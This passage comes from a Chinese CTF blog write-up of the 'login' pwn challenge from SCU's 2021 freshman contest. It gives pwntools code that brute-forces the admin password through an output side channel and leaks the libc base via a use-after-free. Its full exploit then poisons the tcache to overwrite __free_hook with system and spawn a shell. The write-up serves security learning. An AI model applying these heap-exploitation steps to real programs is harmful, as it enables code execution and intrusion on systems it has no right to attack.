class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input id: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password len: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">len</span>(password)))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Add user done!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params"><span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login1</span>(<span class="params"><span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.send(password)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br></pre></td></tr></table></figure>
<p>爆破密码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">burpsuit</span>():</span></span><br><span class="line">    try_pwd = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>):</span><br><span class="line">     <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>, <span class="number">48</span> + <span class="number">79</span>):</span><br><span class="line">        <span class="keyword">if</span> i != <span class="number">47</span>:</span><br><span class="line">            login(<span class="number">0</span>,try_pwd+ <span class="built_in">chr</span>(j) + <span class="string">&#x27;a&#x27;</span> * (<span class="number">152</span>-(i + <span class="number">1</span>)))</span><br><span class="line">            r.recvuntil(<span class="string">b&#x27;a&#x27;</span> * ((<span class="number">152</span> - (i + <span class="number">1</span>))))</span><br><span class="line">            number = u8(r.recv(<span class="number">1</span>))</span><br><span class="line">            <span class="keyword">if</span> number == i + <span class="number">1</span>:</span><br><span class="line">                try_pwd += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            login(<span class="number">0</span>,try_pwd + <span class="built_in">chr</span>(j))</span><br><span class="line">            result = r.recv(<span class="number">1</span>)</span><br><span class="line">            <span class="keyword">if</span> (result != <span class="string">b&quot;W&quot;</span>):</span><br><span class="line">                try_pwd += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">     <span class="built_in">print</span>(<span class="string">&quot;admin_passwd = &quot;</span> + try_pwd)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;ok&quot;</span>)</span><br></pre></td></tr></table></figure>
<h3 id="泄露libc基址"><a class="markdownIt-Anchor" href="#泄露libc基址">#</a> 泄露 libc 基址</h3>
<p>进入 root 用户后，我们可以有一个 UAF 漏洞。而该题的 libc 版本较高，存在 Tcache 机制。因此我们先 add 6 个 user，并将其全部 free，将 6 个 Tcache 填满，然后利用 root 用户的 UAF 漏洞 free 一个堆块 A，这样堆块 A 将置入 unsortedbin 中，而 login 功能其实变相相当于 show 功能，因此我们可以利用 UAF 漏洞提取 unsortedbin 中的 fd 指针，而 fd 指针指向的地址与 main_arena 有固定偏移：</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gww4rft35wj30k70cbjw6.jpg" alt="9"></p>
<p>故可以泄露出 libc 基址。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">8</span>):</span><br><span class="line">    add(i,i,<span class="string">b&#x27;N1rvana&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">8</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">burpsuit()</span><br><span class="line">r.recvuntil(<span class="string">&quot;Input victim index: &quot;</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Haha. Let&#x27;s see what will happen.&quot;</span>)</span><br><span class="line">libc_base=leak_libc_base()</span><br></pre></td></tr></table></figure>
<p>需要注意的是，用 login 函数爆破 libc 基址时需要注意一些特殊字节：</p>
<p>①&quot;\0&quot; 字节，若是爆破字节中出现 &quot;\0&quot; 字节，则由于 % s 的特性，输出到 &quot;\0&quot; 就会终止，不能回显正确密码个数。</p>
<p>由于：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( *(_BYTE *)buf == <span class="number">10</span> )</span><br><span class="line">&#123;</span><br><span class="line">  *(_BYTE *)buf = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> i;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>②&quot;\n&quot; 字节，输入 &quot;\n&quot; 字节密码输入直接终止。</p>
<p>因此我的 leak_libc_base 函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_libc_base</span>():</span></span><br><span class="line">    try_base=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">     <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">0xff</span>):</span><br><span class="line">          <span class="keyword">if</span> j!=<span class="number">10</span>:</span><br><span class="line">            payload = try_base+<span class="built_in">chr</span>(j)+ <span class="string">&#x27;a&#x27;</span> * (<span class="number">152</span>-i-<span class="number">1</span>)</span><br><span class="line">            login(<span class="number">0</span>,payload)</span><br><span class="line">            r.recvuntil(<span class="string">b&#x27;a&#x27;</span> * (<span class="number">152</span> - i-<span class="number">1</span>))</span><br><span class="line">            <span class="comment"># r.recvuntil(&quot;\n&quot;)</span></span><br><span class="line">            number = u8(r.recv(<span class="number">1</span>))</span><br><span class="line">            <span class="built_in">print</span>(number)</span><br><span class="line">            <span class="keyword">if</span> number == i + <span class="number">1</span>:</span><br><span class="line">                try_base = try_base+<span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">     </span><br><span class="line">    try_base =u64(try_base.ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">    libc_base=try_base-<span class="number">0x3ebca0</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">    <span class="keyword">return</span> libc_base</span><br></pre></td></tr></table></figure>
<h3 id="tcache-uaf-attack"><a class="markdownIt-Anchor" href="#tcache-uaf-attack">#</a> Tcache UAF attack</h3>
<p>然后我就不会做了… 呜呜呜。</p>
<p>看了 wp 之后知道是 Tcache UAF attack。然后补足了拼图的最后一小块。</p>
<p>直接打 free_hook。</p>
<h2 id="exp-4"><a class="markdownIt-Anchor" href="#exp-4">#</a> exp</h2>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># context.log_level = &#x27;debug&#x27;</span></span><br><span class="line">r = process(<span class="string">&#x27;/mnt/hgfs/ubuntu/login/login&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/login/login&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/mnt/hgfs/ubuntu/login/libc_login.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">index,<span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input id: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password len: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">len</span>(password)))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Add user done!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params"><span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.sendline(password)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login1</span>(<span class="params"><span class="built_in">id</span>,password</span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input password: &quot;</span>)</span><br><span class="line">    r.send(password)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span></span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&quot;Input user index: &quot;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">burpsuit</span>():</span></span><br><span class="line">    try_pwd = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>):</span><br><span class="line">     <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>, <span class="number">48</span> + <span class="number">79</span>):</span><br><span class="line">        <span class="keyword">if</span> i != <span class="number">47</span>:</span><br><span class="line">            login(<span class="number">0</span>,try_pwd+ <span class="built_in">chr</span>(j) + <span class="string">&#x27;a&#x27;</span> * (<span class="number">152</span>-(i + <span class="number">1</span>)))</span><br><span class="line">            r.recvuntil(<span class="string">b&#x27;a&#x27;</span> * ((<span class="number">152</span> - (i + <span class="number">1</span>))))</span><br><span class="line">            number = u8(r.recv(<span class="number">1</span>))</span><br><span class="line">            <span class="keyword">if</span> number == i + <span class="number">1</span>:</span><br><span class="line">                try_pwd += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            login(<span class="number">0</span>,try_pwd + <span class="built_in">chr</span>(j))</span><br><span class="line">            result = r.recv(<span class="number">1</span>)</span><br><span class="line">            <span class="keyword">if</span> (result != <span class="string">b&quot;W&quot;</span>):</span><br><span class="line">                try_pwd += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">     <span class="built_in">print</span>(<span class="string">&quot;admin_passwd = &quot;</span> + try_pwd)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;ok&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak_libc_base</span>():</span></span><br><span class="line">    try_base=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">     <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">0xff</span>):</span><br><span class="line">          <span class="keyword">if</span> j!=<span class="number">10</span>:</span><br><span class="line">            payload = try_base+<span class="built_in">chr</span>(j)+ <span class="string">&#x27;a&#x27;</span> * (<span class="number">152</span>-i-<span class="number">1</span>)</span><br><span class="line">            login(<span class="number">0</span>,payload)</span><br><span class="line">            r.recvuntil(<span class="string">b&#x27;a&#x27;</span> * (<span class="number">152</span> - i-<span class="number">1</span>))</span><br><span class="line">            <span class="comment"># r.recvuntil(&quot;\n&quot;)</span></span><br><span class="line">            number = u8(r.recv(<span class="number">1</span>))</span><br><span class="line">            <span class="built_in">print</span>(number)</span><br><span class="line">            <span class="keyword">if</span> number == i + <span class="number">1</span>:</span><br><span class="line">                try_base = try_base+<span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">     </span><br><span class="line">    try_base =u64(try_base.ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">    libc_base=try_base-<span class="number">0x3ebca0</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">    <span class="keyword">return</span> libc_base</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">8</span>):</span><br><span class="line">    add(i,i,<span class="string">b&#x27;N1rvana&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">8</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">burpsuit()</span><br><span class="line">r.recvuntil(<span class="string">&quot;Input victim index: &quot;</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;0&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Haha. Let&#x27;s see what will happen.&quot;</span>)</span><br><span class="line">libc_base=leak_libc_base()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">8</span>):</span><br><span class="line">    add(i,i,<span class="string">b&#x27;N1rvana&#x27;</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="number">8</span>,<span class="string">b&#x27;invincible&#x27;</span>)</span><br><span class="line">delete(<span class="number">8</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">9</span>,<span class="number">9</span>,p64(libc_base+libc.symbols[<span class="string">&quot;__free_hook&quot;</span>]))</span><br><span class="line">add(<span class="number">10</span>,<span class="number">10</span>,<span class="string">b&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">11</span>,p64(libc_base+libc.symbols[<span class="string">&quot;system&quot;</span>]))</span><br><span class="line">delete(<span class="number">10</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/wp/" rel="tag"><i class="ic i-tag"></i> wp</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-11-29 17:16:41" itemprop="dateModified" datetime="2021-11-29T17:16:41+08:00">2021-11-29</time>
  </span>
  <span id="2021/11/29/SCU新生赛2021/" class="item leancloud_visitors" data-flag-title="SCU新生赛2021 pwn wp" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="invincible 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="invincible 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>invincible <i class="ic i-at"><em>@</em></i>清風微醺
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://www.wdqjxtmph.top/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" title="SCU新生赛2021 pwn wp">https://www.wdqjxtmph.top/2021/11/29/SCU新生赛2021/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclh0m9pdj20zk0m8hdt.jpg" title="格式化字符串漏洞进阶">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>格式化字符串漏洞进阶</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giph4fomxoj20zk0m8axp.jpg" title="利用realloc调整栈使one_gadget生效">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>利用realloc调整栈使one_gadget生效</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2text"><span class="toc-number">1.</span> <span class="toc-text"> ret2text</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2shellcode"><span class="toc-number">2.</span> <span class="toc-text"> ret2shellcode</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#quiz"><span class="toc-number">3.</span> <span class="toc-text"> quiz</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ret2libc"><span class="toc-number">4.</span> <span class="toc-text"> ret2libc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-number">4.1.</span> <span class="toc-text"> 思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x1%E5%9C%B0%E5%9D%80%E6%B3%84%E9%9C%B2"><span class="toc-number">4.1.1.</span> <span class="toc-text"> 0x1 地址泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x2%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="toc-number">4.1.2.</span> <span class="toc-text"> 0x2 栈溢出</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">4.2.</span> <span class="toc-text"> exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#got_it"><span class="toc-number">5.</span> <span class="toc-text"> got_it</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-2"><span class="toc-number">5.1.</span> <span class="toc-text"> 思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x1%E6%BA%A2%E5%87%BA"><span class="toc-number">5.1.1.</span> <span class="toc-text"> 0x1 溢出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x2%E6%8E%A7%E5%88%B6%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88"><span class="toc-number">5.1.2.</span> <span class="toc-text"> 0x2 控制函数指针</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x3-pie%E7%BB%95%E8%BF%87%E6%94%B9%E5%86%99got%E8%A1%A8"><span class="toc-number">5.1.3.</span> <span class="toc-text"> 0x3 pie 绕过，改写 GOT 表</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp-2"><span class="toc-number">5.2.</span> <span class="toc-text"> exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#safe_copy"><span class="toc-number">6.</span> <span class="toc-text"> safe_copy</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-3"><span class="toc-number">6.1.</span> <span class="toc-text"> 思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x1%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA"><span class="toc-number">6.1.1.</span> <span class="toc-text"> 0x1 整数溢出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x2%E6%B3%84%E9%9C%B2canary%E4%B8%8Elibc%E5%9F%BA%E5%9D%80"><span class="toc-number">6.1.2.</span> <span class="toc-text"> 0x2 泄露 canary 与 libc 基址</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp-3"><span class="toc-number">6.2.</span> <span class="toc-text"> exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#login"><span class="toc-number">7.</span> <span class="toc-text"> login</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90"><span class="toc-number">7.1.</span> <span class="toc-text"> 程序流程分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-4"><span class="toc-number">7.2.</span> <span class="toc-text"> 思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#root%E7%94%A8%E6%88%B7"><span class="toc-number">7.2.1.</span> <span class="toc-text"> root 用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%84%E9%9C%B2libc%E5%9F%BA%E5%9D%80"><span class="toc-number">7.2.2.</span> <span class="toc-text"> 泄露 libc 基址</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#tcache-uaf-attack"><span class="toc-number">7.2.3.</span> <span class="toc-text"> Tcache UAF attack</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp-4"><span class="toc-number">7.3.</span> <span class="toc-text"> exp</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2021/08/20/string/" rel="bookmark" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></li><li><a href="/2021/09/03/babyrop/" rel="bookmark" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></li><li><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" rel="bookmark" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></li><li><a href="/2021/09/09/64%E4%BD%8D%E6%A0%87%E5%87%86ROP%E4%B8%8E%E5%A0%86%E6%A0%88%E5%B9%B3%E8%A1%A1/" rel="bookmark" title="标准64位程序ROP流程和堆栈平衡">标准64位程序ROP流程和堆栈平衡</a></li><li><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="bookmark" title="电科新生赛">电科新生赛</a></li><li><a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" rel="bookmark" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></li><li class="active"><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" rel="bookmark" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></li><li><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" rel="bookmark" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></li><li><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" rel="bookmark" title="Tcachebin 总结">Tcachebin 总结</a></li><li><a href="/2022/04/06/wustctf2020_babyfmt/" rel="bookmark" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></li><li><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" rel="bookmark" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></li><li><a href="/2022/07/15/DSCTF%E9%83%A8%E5%88%86wp/" rel="bookmark" title="DSCTF pwn 部分wp">DSCTF pwn 部分wp</a></li><li><a 